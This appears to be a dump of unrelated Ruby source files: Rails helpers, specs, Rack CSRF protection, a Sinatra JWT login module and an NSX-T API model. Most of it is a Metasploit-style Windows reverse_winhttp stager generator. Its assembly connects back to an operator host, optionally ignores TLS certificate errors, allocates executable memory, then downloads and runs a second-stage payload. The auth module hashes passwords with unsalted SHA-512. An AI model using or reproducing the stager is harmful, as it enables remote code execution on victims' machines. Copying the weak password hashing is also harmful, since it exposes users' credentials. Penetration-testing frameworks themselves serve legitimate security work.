    @page_title << title if title.present?
    @page_title.join(' | ')
  end

  # Translate a controlled-vocabulary code into its human-readable label.
  def humanize_uri_code(vocab, code)
    t("controlled_vocabularies.#{vocab}.#{code}")
  end

  # Translate a controlled-vocabulary URI into its human-readable label,
  # or nil when the URI is unknown to the vocabulary.
  def humanize_uri(vocab, uri)
    code = CONTROLLED_VOCABULARIES[vocab].from_uri(uri)
    code.nil? ? nil : humanize_uri_code(vocab, code)
  end

  # A question-mark icon carrying +text+ as its tooltip.
  def help_tooltip(text)
    content_tag(:span, fa_icon('question-circle'), title: text)
  end

  # Simple wrapper around time_tag to handle nil dates (time_tag 500s
  # otherwise). See https://github.com/ualbertalib/jupiter/issues/159
  def jupiter_time_tag(date, format: '%F', blank_message: '')
    date.blank? ? blank_message : time_tag(date, format: format)
  end

  # "x minutes ago"-style phrase, or +blank_message+ for a blank date.
  def jupiter_time_ago_in_words(date, blank_message: '')
    date.blank? ? blank_message : t('time_ago', time: time_ago_in_words(date))
  end

  # "first-last of total" summary for a paginated result set.
  def results_range(results)
    lower = results.offset_value + 1
    upper = results.offset_value + results.count
    t(:page_range, first: lower, last: upper, total: results.total_count)
  end

  # Link to a faceted (or plain keyword) search on +attribute+ == +value+.
  def search_link_for(object, attribute, value: nil, facet: true, display: nil)
    value ||= object.send(attribute)
    display ||= value
    target = if facet
               search_path(facets: object.class.facet_term_for(attribute, value))
             else
               search_path(search: object.class.search_term_for(attribute, value))
             end
    link_to(display, target, rel: 'nofollow')
  end

  # Word-boundary truncation with sensible defaults.
  def jupiter_truncate(text, length: TRUNCATE_CHARS_DEFAULT, separator: ' ', omission: '...')
    truncate(text, length: length, separator: separator, omission: omission)
  end
end
| 32.05 | 108 | 0.720229 |
183482630b46bd9c53f73dd6c2e7590973b4b8f3 | 442 | require 'rails_helper'
# Specs in this file have access to a helper object that includes
# the DonationsHelper. For example:
#
# describe DonationsHelper do
# describe "string concat" do
# it "concats two strings with spaces" do
# expect(helper.concat_strings("this","that")).to eq("this that")
# end
# end
# end
# Placeholder helper spec generated by Rails; marked pending until real
# examples are added.
RSpec.describe DonationsHelper, type: :helper do
  pending "add some examples to (or delete) #{__FILE__}"
end
| 27.625 | 71 | 0.71267 |
module CacheDebugging
  # Use the cache_digests gem's digestor when it is available (Rails 3.x
  # backport); otherwise fall back to the built-in ActionView::Digestor.
  # Replaces a bare `rescue` modifier, which silently swallowed ANY
  # StandardError raised while resolving the constant, with an explicit
  # feature check.
  Digestor =
    if defined?(CacheDigests::TemplateDigestor)
      CacheDigests::TemplateDigestor
    else
      ActionView::Digestor
    end
end
03db6b6bab02f7b94c0e26181facbdd81d68cd24 | 949 | require 'rack/protection'
module Rack
  module Protection
    ##
    # Prevented attack:: CSRF
    # Supported browsers:: all
    # More infos:: http://en.wikipedia.org/wiki/Cross-site_request_forgery
    #
    # Only accepts unsafe HTTP requests if a given access token matches the token
    # included in the session.
    #
    # Compatible with Rails and rack-csrf.
    #
    # Options:
    #
    # authenticity_param: Defines the param's name that should contain the token on a request.
    #
    class AuthenticityToken < Base
      default_options :authenticity_param => 'authenticity_token'

      # True when the request may proceed: either it uses a safe HTTP verb,
      # or it presents the session's CSRF token via the X-CSRF-Token header
      # or via the configured form parameter.
      def accepts?(env)
        session = session env
        # Lazily create the per-session token, honouring a token already
        # stored under the Rails key '_csrf_token'.
        token = session[:csrf] ||= session['_csrf_token'] || random_string
        # secure_compare is constant-time, preventing timing attacks
        # against the token value.
        safe?(env) ||
          secure_compare(env['HTTP_X_CSRF_TOKEN'].to_s, token) ||
          secure_compare(Request.new(env).params[options[:authenticity_param]].to_s, token)
      end
    end
  end
end
| 29.65625 | 94 | 0.651212 |
87ba45d896d775ccb8df36b8cb8c5f786462d1ba | 20,522 | # -*- coding: binary -*-
module Msf
###
#
# Complex payload generation for Windows ARCH_X86 that speak HTTP(S) using WinHTTP
#
###
module Payload::Windows::ReverseWinHttp
include Msf::Payload::Windows::ReverseHttp
#
# Register reverse_winhttp specific options
#
def initialize(*args)
super
register_advanced_options([
OptBool.new('HttpProxyIE', 'Enable use of IE proxy settings', default: true, aliases: ['PayloadProxyIE'])
], self.class)
end
#
# Generate the first stage
#
def generate(opts={})
ds = opts[:datastore] || datastore
conf = {
ssl: opts[:ssl] || false,
host: ds['LHOST'] || '127.127.127.127',
port: ds['LPORT']
}
# Add extra options if we have enough space
if self.available_space.nil? || required_space <= self.available_space
conf[:uri] = luri + generate_uri
conf[:exitfunk] = ds['EXITFUNC']
conf[:verify_cert_hash] = opts[:verify_cert_hash]
conf[:proxy_host] = ds['HttpProxyHost']
conf[:proxy_port] = ds['HttpProxyPort']
conf[:proxy_user] = ds['HttpProxyUser']
conf[:proxy_pass] = ds['HttpProxyPass']
conf[:proxy_type] = ds['HttpProxyType']
conf[:retry_count] = ds['StagerRetryCount']
conf[:proxy_ie] = ds['HttpProxyIE']
conf[:custom_headers] = get_custom_headers(ds)
else
# Otherwise default to small URIs
conf[:uri] = luri + generate_small_uri
end
generate_reverse_winhttp(conf)
end
def transport_config(opts={})
transport_config_reverse_http(opts)
end
#
# Generate and compile the stager
#
def generate_reverse_winhttp(opts={})
combined_asm = %Q^
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
#{asm_block_api}
start:
pop ebp
#{asm_reverse_winhttp(opts)}
^
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
end
#
# Determine the maximum amount of space required for the features requested
#
def required_space
# Start with our cached default generated size
space = cached_size
# Add 100 bytes for the encoder to have some room
space += 100
# Make room for the maximum possible URL length (wchars)
space += 512 * 2
# proxy (wchars)
space += 128 * 2
# EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
space += 31
# Custom headers? Ugh, impossible to tell
space += 512 * 2
# The final estimated size
space
end
#
# Convert a string into a NULL-terminated wchar byte array
#
def asm_generate_wchar_array(str)
(str.to_s + "\x00").
unpack("C*").
pack("v*").
unpack("C*").
map{ |c| "0x%.2x" % c }.
join(",")
end
#
# Generate an assembly stub with the configured feature set and options.
#
# @option opts [Bool] :ssl Whether or not to enable SSL
# @option opts [String] :uri The URI to request during staging
# @option opts [String] :host The host to connect to
# @option opts [Integer] :port The port to connect to
# @option opts [String] :verify_cert_hash A 20-byte raw SHA-1 hash of the certificate to verify, or nil
# @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
# @option opts [Integer] :retry_count The number of times to retry a failed request before giving up
#
def asm_reverse_winhttp(opts={})
retry_count = [opts[:retry_count].to_i, 1].max
verify_ssl = nil
encoded_cert_hash = nil
encoded_uri = asm_generate_wchar_array(opts[:uri])
encoded_host = asm_generate_wchar_array(opts[:host])
# this is used by the IE proxy functionality when an autoconfiguration URL
# is specified. We need the full URL otherwise the call to resolve the proxy
# for the URL doesn't work.
full_url = 'http'
full_url << 's' if opts[:ssl]
full_url << '://' << opts[:host]
full_url << ":#{opts[:port]}" if opts[:ssl] && opts[:port] != 443
full_url << ":#{opts[:port]}" if !opts[:ssl] && opts[:port] != 80
full_url << opts[:uri]
encoded_full_url = asm_generate_wchar_array(full_url)
encoded_uri_index = (full_url.length - opts[:uri].length) * 2
if opts[:ssl] && opts[:verify_cert_hash]
verify_ssl = true
encoded_cert_hash = opts[:verify_cert_hash].unpack("C*").map{|c| "0x%.2x" % c }.join(",")
end
proxy_enabled = !!(opts[:proxy_host].to_s.strip.length > 0)
proxy_info = ""
if proxy_enabled
if opts[:proxy_type].to_s.downcase == "socks"
proxy_info << "socks="
else
proxy_info << "http://"
end
proxy_info << opts[:proxy_host].to_s
if opts[:proxy_port].to_i > 0
proxy_info << ":#{opts[:proxy_port]}"
end
proxy_info = asm_generate_wchar_array(proxy_info)
end
proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_user])
proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_pass])
custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:custom_headers])
http_open_flags = 0
secure_flags = 0
if opts[:ssl]
http_open_flags = (
0x00800000 | # WINHTTP_FLAG_SECURE
0x00000100 ) # WINHTTP_FLAG_BYPASS_PROXY_CACHE
secure_flags = (
0x00002000 | # SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
0x00001000 | # SECURITY_FLAG_IGNORE_CERT_CN_INVALID
0x00000200 | # SECURITY_FLAG_IGNORE_WRONG_USAGE
0x00000100 ) # SECURITY_FLAG_IGNORE_UNKNOWN_CA
else
http_open_flags = (
0x00000100 ) # WINHTTP_FLAG_BYPASS_PROXY_CACHE
end
ie_proxy_autodect = (
0x00000001 | # WINHTTP_AUTO_DETECT_TYPE_DHCP
0x00000002 ) # WINHTTP_AUTO_DETECT_TYPE_DNS_A
ie_proxy_flags = (
0x00000001 | # WINHTTP_AUTOPROXY_AUTO_DETECT
0x00000002 ) # WINHTTP_AUTOPROXY_CONFIG_URL
asm = %Q^
; Input: EBP must be the address of 'api_call'.
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
load_winhttp:
push 0x00707474 ; Push the string 'winhttp',0
push 0x686E6977 ; ...
push esp ; Push a pointer to the "winhttp" string
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "winhttp" )
^
if verify_ssl
asm << %Q^
load_crypt32:
push 0x00323374 ; Push the string 'crypt32',0
push 0x70797263 ; ...
push esp ; Push a pointer to the "crypt32" string
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "wincrypt" )
^
end
asm << %Q^
xor ebx, ebx
WinHttpOpen:
^
if proxy_enabled
asm << %Q^
push ebx ; Flags
push esp ; ProxyBypass ("")
call get_proxy_server
db #{proxy_info}
get_proxy_server:
; ProxyName (via call)
push 3 ; AccessType (NAMED_PROXY= 3)
push ebx ; UserAgent (NULL) [1]
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}
call ebp
^
else
asm << %Q^
push ebx ; Flags
push ebx ; ProxyBypass (NULL)
push ebx ; ProxyName (NULL)
push ebx ; AccessType (DEFAULT_PROXY= 0)
push ebx ; UserAgent (NULL) [1]
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}
call ebp
^
end
if opts[:proxy_ie] == true && !proxy_enabled
asm << %Q^
push eax ; Session handle is required later for ie proxy
^
end
asm << %Q^
WinHttpConnect:
push ebx ; Reserved (NULL)
push #{opts[:port]} ; Port [3]
call got_server_uri ; Double call to get pointer for both server_uri and
server_uri: ; server_host; server_uri is saved in edi for later
^
if opts[:proxy_ie] == true && !proxy_enabled
asm << %Q^
db #{encoded_full_url}
got_server_host:
add edi, #{encoded_uri_index} ; move edi up to where the URI starts
^
else
asm << %Q^
db #{encoded_uri}
got_server_host:
^
end
asm << %Q^
push eax ; Session handle returned by WinHttpOpen
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpConnect')}
call ebp
WinHttpOpenRequest:
push 0x#{http_open_flags.to_s(16)}
push ebx ; AcceptTypes (NULL)
push ebx ; Referrer (NULL)
push ebx ; Version (NULL)
push edi ; ObjectName (URI)
push ebx ; Verb (GET method) (NULL)
push eax ; Connect handle returned by WinHttpConnect
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpenRequest')}
call ebp
xchg esi, eax ; save HttpRequest handler in esi
^
if proxy_enabled && proxy_user
asm << %Q^
push ebx ; pAuthParams (NULL)
^
if proxy_pass
asm << %Q^
call got_proxy_pass ; put proxy_pass on the stack
proxy_pass:
db #{proxy_pass}
got_proxy_pass:
; pwszPassword now on the stack
^
else
asm << %Q^
push ebx ; pwszPassword (NULL)
^
end
asm << %Q^
call got_proxy_user ; put proxy_user on the stack
proxy_user:
db #{proxy_user}
got_proxy_user:
; pwszUserName now on the stack
push 1 ; AuthScheme (WINHTTP_AUTH_SCHEME_BASIC = 1)
push 1 ; AuthTargets (WINHTTP_AUTH_TARGET_PROXY = 1)
push esi ; hRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetCredentials')}
call ebp
^
elsif opts[:proxy_ie] == true
asm << %Q^
; allocate space for WINHTTP_CURRENT_USER_IE_PROXY_CONFIG, which is
; a 16-byte structure
sub esp, 16
mov eax, esp ; store a pointer to the buffer
push edi ; store the current URL in case it's needed
mov edi, eax ; put the buffer pointer in edi
push edi ; Push a pointer to the buffer
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')}
call ebp
test eax, eax ; skip the rest of the proxy stuff if the call failed
jz ie_proxy_setup_finish
; we don't care about the "auto detect" flag, as it doesn't seem to
; impact us at all.
; if auto detect isn't on, check if there's an auto configuration URL
mov eax, [edi+4]
test eax, eax
jz ie_proxy_manual
; restore the URL we need to reference
pop edx
sub edx, #{encoded_uri_index} ; move edx up to where the full URL starts
; set up the autoproxy structure on the stack
push 1 ; fAutoLogonIfChallenged (1=TRUE)
push ebx ; dwReserved (0)
push ebx ; lpReserved (NULL)
push eax ; lpszAutoConfigUrl
push #{ie_proxy_autodect} ; dwAutoDetectFlags
push #{ie_proxy_flags} ; dwFlags
mov eax, esp
; prepare space for the resulting proxy info structure
sub esp, 12
mov edi, esp ; store the proxy pointer
; prepare the WinHttpGetProxyForUrl call
push edi ; pProxyInfo
push eax ; pAutoProxyOptions
push edx ; lpcwszUrl
lea eax, [esp+64] ; Find the pointer to the hSession - HACK!
push [eax] ; hSession
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')}
call ebp
test eax, eax ; skip the rest of the proxy stuff if the call failed
jz ie_proxy_setup_finish
jmp set_ie_proxy ; edi points to the filled out proxy structure
ie_proxy_manual:
; check to see if a manual proxy is specified, if not, we skip
mov eax, [edi+8]
test eax, eax
jz ie_proxy_setup_finish
; manual proxy present, set up the proxy info structure by patching the
; existing current user IE structure that is in edi
push 4
pop eax
add edi, eax ; skip over the fAutoDetect flag
dec eax
mov [edi], eax ; set dwAccessType (3=WINHTTP_ACCESS_TYPE_NAMED_PROXY)
; fallthrough to set the ie proxy
set_ie_proxy:
; we assume that edi is going to point to the proxy options
push 12 ; dwBufferLength (sizeof proxy options)
push edi ; lpBuffer (pointer to the proxy)
push 38 ; dwOption (WINHTTP_OPTION_PROXY)
push esi ; hRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')}
call ebp
ie_proxy_setup_finish:
^
end
if opts[:ssl]
asm << %Q^
; WinHttpSetOption (hInternet, WINHTTP_OPTION_SECURITY_FLAGS, &buffer, sizeof(buffer) );
set_security_options:
push 0x#{secure_flags.to_s(16)}
mov eax, esp
push 4 ; sizeof(buffer)
push eax ; &buffer
push 31 ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS)
push esi ; hHttpRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')}
call ebp
^
end
asm << %Q^
; Store our retry counter in the edi register
set_retry:
push #{retry_count}
pop edi
send_request:
WinHttpSendRequest:
push ebx ; Context [7]
push ebx ; TotalLength [6]
push ebx ; OptionalLength (0) [5]
push ebx ; Optional (NULL) [4]
^
if custom_headers
asm << %Q^
push -1 ; dwHeadersLength (assume NULL terminated) [3]
call get_req_headers ; lpszHeaders (pointer to the custom headers) [2]
db #{custom_headers}
get_req_headers:
^
else
asm << %Q^
push ebx ; HeadersLength (0) [3]
push ebx ; Headers (NULL) [2]
^
end
asm << %Q^
push esi ; HttpRequest handle returned by WinHttpOpenRequest [1]
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')}
call ebp
test eax,eax
jnz check_response ; if TRUE call WinHttpReceiveResponse API
try_it_again:
dec edi
jnz send_request
; if we didn't allocate before running out of retries, fall through
^
if opts[:exitfunk]
asm << %Q^
failure:
call exitfunk
^
else
asm << %Q^
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
^
end
# Jump target if the request was sent successfully
asm << %Q^
check_response:
^
# Verify the SSL certificate hash
if verify_ssl
asm << %Q^
ssl_cert_get_context:
push 4
mov ecx, esp ; Allocate &bufferLength
push 0
mov ebx, esp ; Allocate &buffer (ebx will point to *pCert)
push ecx ; &bufferLength
push ebx ; &buffer
push 78 ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT)
push esi ; hHttpRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpQueryOption')}
call ebp
test eax, eax ;
jz failure ; Bail out if we couldn't get the certificate context
; ebx
ssl_cert_allocate_hash_space:
push 20 ;
mov ecx, esp ; Store a reference to the address of 20
sub esp,[ecx] ; Allocate 20 bytes for the hash output
mov edi, esp ; edi will point to our buffer
ssl_cert_get_server_hash:
push ecx ; &bufferLength
push edi ; &buffer (20-byte SHA1 hash)
push 3 ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID)
push [ebx] ; *pCert
push #{Rex::Text.block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')}
call ebp
test eax, eax ;
jz failure ; Bail out if we couldn't get the certificate context
ssl_cert_start_verify:
call ssl_cert_compare_hashes
db #{encoded_cert_hash}
ssl_cert_compare_hashes:
pop ebx ; ebx points to our internal 20-byte certificate hash (overwrites *pCert)
; edi points to the server-provided certificate hash
push 4 ; Compare 20 bytes (5 * 4) by repeating 4 more times
pop ecx ;
mov edx, ecx ; Keep a reference to 4 in edx
ssl_cert_verify_compare_loop:
mov eax, [ebx] ; Grab the next DWORD of the hash
cmp eax, [edi] ; Compare with the server hash
jnz failure ; Bail out if the DWORD doesn't match
add ebx, edx ; Increment internal hash pointer by 4
add edi, edx ; Increment server hash pointer by 4
loop ssl_cert_verify_compare_loop
; Our certificate hash was valid, hurray!
ssl_cert_verify_cleanup:
xor ebx, ebx ; Reset ebx back to zero
^
end
asm << %Q^
receive_response:
; The API WinHttpReceiveResponse needs to be called
; first to get a valid handle for WinHttpReadData
push ebx ; Reserved (NULL)
push esi ; Request handler returned by WinHttpSendRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')}
call ebp
test eax,eax
jz failure
allocate_memory:
push 0x40 ; PAGE_EXECUTE_READWRITE
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (4Mb ought to do us)
push ebx ; NULL as we dont care where the allocation is
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
xchg eax, ebx ; place the allocated base address in ebx
push ebx ; store a copy of the stage base address on the stack
push ebx ; temporary storage for bytes read count
mov edi, esp ; &bytesRead
download_more:
push edi ; NumberOfBytesRead (bytesRead)
push 8192 ; NumberOfBytesToRead
push ebx ; Buffer
push esi ; Request handler returned by WinHttpReceiveResponse
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')}
call ebp
test eax,eax ; if download failed? (optional?)
jz failure
mov eax, [edi]
add ebx, eax ; buffer += bytes_received
test eax,eax ; optional?
jnz download_more ; continue until it returns 0
pop eax ; clear the temporary storage
execute_stage:
ret ; dive into the stored stage address
got_server_uri:
pop edi
call got_server_host ; put the server_host on the stack (WinHttpConnect API [2])
server_host:
db #{encoded_host}
^
if opts[:exitfunk]
asm << asm_exitfunk(opts)
end
asm
end
end
end
| 33.314935 | 115 | 0.568658 |
8711f038b3f02e04c8d2e66433b0e004a8b8f48a | 2,755 | require 'helper'
# Specs for the Twitter trends API wrappers. Each group stubs the
# corresponding REST endpoint with webmock and asserts both that the
# correct resource was requested and that the response is deserialized
# into the expected Twitter::* objects.
describe Twitter::REST::API::Trends do
before do
@client = Twitter::REST::Client.new(:consumer_key => 'CK', :consumer_secret => 'CS', :access_token => 'AT', :access_token_secret => 'AS')
end
describe '#trends' do
# GET trends/place with an explicit WOEID (2487956 = San Francisco).
context 'with woeid passed' do
before do
stub_get('/1.1/trends/place.json').with(:query => {:id => '2487956'}).to_return(:body => fixture('matching_trends.json'), :headers => {:content_type => 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.trends(2_487_956)
expect(a_get('/1.1/trends/place.json').with(:query => {:id => '2487956'})).to have_been_made
end
it 'returns the top 10 trending topics for a specific WOEID' do
matching_trends = @client.trends(2_487_956)
expect(matching_trends).to be_a Twitter::TrendResults
expect(matching_trends.first).to be_a Twitter::Trend
expect(matching_trends.first.name).to eq('#sevenwordsaftersex')
end
end
# With no WOEID the client defaults to id=1 (worldwide).
context 'without arguments passed' do
before do
stub_get('/1.1/trends/place.json').with(:query => {:id => '1'}).to_return(:body => fixture('matching_trends.json'), :headers => {:content_type => 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.trends
expect(a_get('/1.1/trends/place.json').with(:query => {:id => '1'})).to have_been_made
end
end
end
# GET trends/available - all locations with trending-topic data.
describe '#trends_available' do
before do
stub_get('/1.1/trends/available.json').to_return(:body => fixture('locations.json'), :headers => {:content_type => 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.trends_available
expect(a_get('/1.1/trends/available.json')).to have_been_made
end
it 'returns the locations that Twitter has trending topic information for' do
locations = @client.trends_available
expect(locations).to be_an Array
expect(locations.first).to be_a Twitter::Place
expect(locations.first.name).to eq('Ireland')
end
end
# GET trends/closest - locations nearest to the client.
describe '#trends_closest' do
before do
stub_get('/1.1/trends/closest.json').to_return(:body => fixture('locations.json'), :headers => {:content_type => 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.trends_closest
expect(a_get('/1.1/trends/closest.json')).to have_been_made
end
it 'returns the locations that Twitter has trending topic information for' do
locations = @client.trends_closest
expect(locations).to be_an Array
expect(locations.first).to be_a Twitter::Place
expect(locations.first.name).to eq('Ireland')
end
end
end
| 39.927536 | 195 | 0.665336 |
62d817379ab69edc8fc2d16f6b63076d4e5e5ee9 | 215 | class CreateProjects < ActiveRecord::Migration[6.1]
# Create the projects table: name/description plus a reference to a
# location and the standard created_at/updated_at columns.
def change
create_table :projects do |t|
t.string :name
t.string :description
# NOTE(review): plain integer column - no index or foreign-key
# constraint; if this backs a belongs_to :location association,
# consider t.references :location instead. TODO confirm.
t.integer :location_id
t.timestamps
end
end
end
| 17.916667 | 51 | 0.660465 |
d50d6fae1ce5dcbd7ef342b61d12d7b1790bd295 | 1,781 | $secret = File.read 'secret.txt'
require 'digest'
require 'jwt'
# Authenticate +username+/+password+ against the users table.
#
# Returns a signed HS256 JWT string on success, false on failure.
# The 'random' claim makes every issued token unique.
#
# NOTE(review): passwords are hashed with a single unsalted SHA-512
# round; a proper KDF (bcrypt/argon2) would be stronger, but changing
# it would invalidate every stored hash, so it is only flagged here.
def login(username, password)
  password_hash = Digest::SHA512.digest password
  # Best-effort scrub of the plaintext now that it has been hashed.
  # The original used non-destructive gsub and discarded the result
  # (a no-op); gsub! actually overwrites the string in place.
  password.gsub!(/./, ' ') unless password.frozen?
  rows = $db.execute('SELECT * FROM users WHERE username=? AND password_hash=? LIMIT 1;', [username, password_hash])
  return false if rows.empty?
  payload = { 'username' => username, 'random' => Random.rand }
  JWT.encode payload, $secret, 'HS256'
end
# Create a new user account and return a signed HS256 JWT for it.
#
# Returns false when registration is disabled ($enable_register is
# falsy) or when the username is already taken.
def register(username, password)
  return false unless $enable_register
  # Reject duplicate usernames.
  return false unless $db.execute('SELECT * FROM users WHERE username=? LIMIT 1;', [username]).empty?
  password_hash = Digest::SHA512.digest password
  # Best-effort scrub of the plaintext after hashing. The original
  # non-destructive gsub discarded its result and scrubbed nothing.
  password.gsub!(/./, ' ') unless password.frozen?
  $db.execute('INSERT INTO users (username, password_hash) VALUES (?, ?);', [username, password_hash])
  payload = { 'username' => username, 'random' => Random.rand }
  JWT.encode payload, $secret, 'HS256'
end
# Verify +token+'s HS256 signature against $secret and return the
# 'username' claim from its payload. Raises JWT::DecodeError (or a
# subclass such as JWT::VerificationError) when the token is invalid.
def decode_token(token)
  claims, _header = JWT.decode(token, $secret, true, { :algorithm => 'HS256' })
  claims['username']
end
# Check whether +token+ is a valid JWT belonging to an existing user.
#
# Returns the decoded username (truthy) when valid, false otherwise.
# Callers rely on receiving the username, so the non-boolean return is
# kept despite the predicate-style name.
def valid_token?(token)
  username = decode_token(token)
  rows = $db.execute('SELECT * FROM users WHERE username=? LIMIT 1;', [username])
  rows.empty? ? false : username
rescue JWT::DecodeError
  # Rescue the base class: the original caught only
  # JWT::VerificationError, so malformed or expired tokens raised a
  # JWT::DecodeError straight out of this method (a 500 for the caller).
  false
end
# POST /auth/login - exchange username/password for a JWT.
# Responds 403 with an empty body on bad credentials (Sinatra treats a
# returned integer as the status code), otherwise a JSON {"token": ...}.
post '/auth/login' do
username = request[:username]
password = request[:password]
token = login(username, password)
return 403 unless token
{
'token' => token
}.to_json
end
# POST /auth/register - create an account and return its JWT.
# Responds 403 when registration is disabled or the username is taken
# (register returns false), otherwise a JSON {"token": ...}.
post '/auth/register' do
username = request[:username]
password = request[:password]
token = register(username, password)
return 403 unless token
{
'token' => token
}.to_json
end
post '/auth/test' do
{
'username' => decode_token(request[:token])
}.to_json
end | 25.084507 | 116 | 0.68557 |
2877535165e53d7278e6f802feb7de9fdffbda12 | 14,156 | =begin
#NSX-T Data Center Policy API
#VMware NSX-T Data Center Policy REST API
OpenAPI spec version: 3.1.0.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.17
=end
require 'date'
module NSXTPolicy
# Child wrapper object for IPSecVpnSession, used in hierarchical API.
class ChildIPSecVpnSession
# Link to this resource
attr_accessor :_self
# The server will populate this field when returing the resource. Ignored on PUT and POST.
attr_accessor :_links
# Schema for this resource
attr_accessor :_schema
# The _revision property describes the current revision of the resource. To prevent clients from overwriting each other's changes, PUT operations must include the current _revision of the resource, which clients should obtain by issuing a GET operation. If the _revision provided in a PUT request is missing or stale, the operation will be rejected.
attr_accessor :_revision
# Indicates system owned resource
attr_accessor :_system_owned
# Defaults to ID if not set
attr_accessor :display_name
# Description of this resource
attr_accessor :description
# Opaque identifiers meaningful to the API user
attr_accessor :tags
# ID of the user who created this resource
attr_accessor :_create_user
# Protection status is one of the following: PROTECTED - the client who retrieved the entity is not allowed to modify it. NOT_PROTECTED - the client who retrieved the entity is allowed to modify it REQUIRE_OVERRIDE - the client who retrieved the entity is a super user and can modify it, but only when providing the request header X-Allow-Overwrite=true. UNKNOWN - the _protection field could not be determined for this entity.
attr_accessor :_protection
# Timestamp of resource creation
attr_accessor :_create_time
# Timestamp of last modification
attr_accessor :_last_modified_time
# ID of the user who last modified this resource
attr_accessor :_last_modified_user
# Unique identifier of this resource
attr_accessor :id
attr_accessor :resource_type
# Indicates whether this object is the overridden intent object Global intent objects cannot be modified by the user. However, certain global intent objects can be overridden locally by use of this property. In such cases, the overridden local values take precedence over the globally defined values for the properties.
attr_accessor :mark_for_override
# If this field is set to true, delete operation is triggered on the intent tree. This resource along with its all children in intent tree will be deleted. This is a cascade delete and should only be used if intent object along with its all children are to be deleted. This does not support deletion of single non-leaf node within the tree and should be used carefully.
attr_accessor :marked_for_delete
# Contains the actual IPSecVpnSession object.
attr_accessor :ip_sec_vpn_session
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'_self' => :'_self',
:'_links' => :'_links',
:'_schema' => :'_schema',
:'_revision' => :'_revision',
:'_system_owned' => :'_system_owned',
:'display_name' => :'display_name',
:'description' => :'description',
:'tags' => :'tags',
:'_create_user' => :'_create_user',
:'_protection' => :'_protection',
:'_create_time' => :'_create_time',
:'_last_modified_time' => :'_last_modified_time',
:'_last_modified_user' => :'_last_modified_user',
:'id' => :'id',
:'resource_type' => :'resource_type',
:'mark_for_override' => :'mark_for_override',
:'marked_for_delete' => :'marked_for_delete',
:'ip_sec_vpn_session' => :'IPSecVpnSession'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'_self' => :'SelfResourceLink',
:'_links' => :'Array<ResourceLink>',
:'_schema' => :'String',
:'_revision' => :'Integer',
:'_system_owned' => :'BOOLEAN',
:'display_name' => :'String',
:'description' => :'String',
:'tags' => :'Array<Tag>',
:'_create_user' => :'String',
:'_protection' => :'String',
:'_create_time' => :'Integer',
:'_last_modified_time' => :'Integer',
:'_last_modified_user' => :'String',
:'id' => :'String',
:'resource_type' => :'String',
:'mark_for_override' => :'BOOLEAN',
:'marked_for_delete' => :'BOOLEAN',
:'ip_sec_vpn_session' => :'IPSecVpnSession'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'_self')
self._self = attributes[:'_self']
end
if attributes.has_key?(:'_links')
if (value = attributes[:'_links']).is_a?(Array)
self._links = value
end
end
if attributes.has_key?(:'_schema')
self._schema = attributes[:'_schema']
end
if attributes.has_key?(:'_revision')
self._revision = attributes[:'_revision']
end
if attributes.has_key?(:'_system_owned')
self._system_owned = attributes[:'_system_owned']
end
if attributes.has_key?(:'display_name')
self.display_name = attributes[:'display_name']
end
if attributes.has_key?(:'description')
self.description = attributes[:'description']
end
if attributes.has_key?(:'tags')
if (value = attributes[:'tags']).is_a?(Array)
self.tags = value
end
end
if attributes.has_key?(:'_create_user')
self._create_user = attributes[:'_create_user']
end
if attributes.has_key?(:'_protection')
self._protection = attributes[:'_protection']
end
if attributes.has_key?(:'_create_time')
self._create_time = attributes[:'_create_time']
end
if attributes.has_key?(:'_last_modified_time')
self._last_modified_time = attributes[:'_last_modified_time']
end
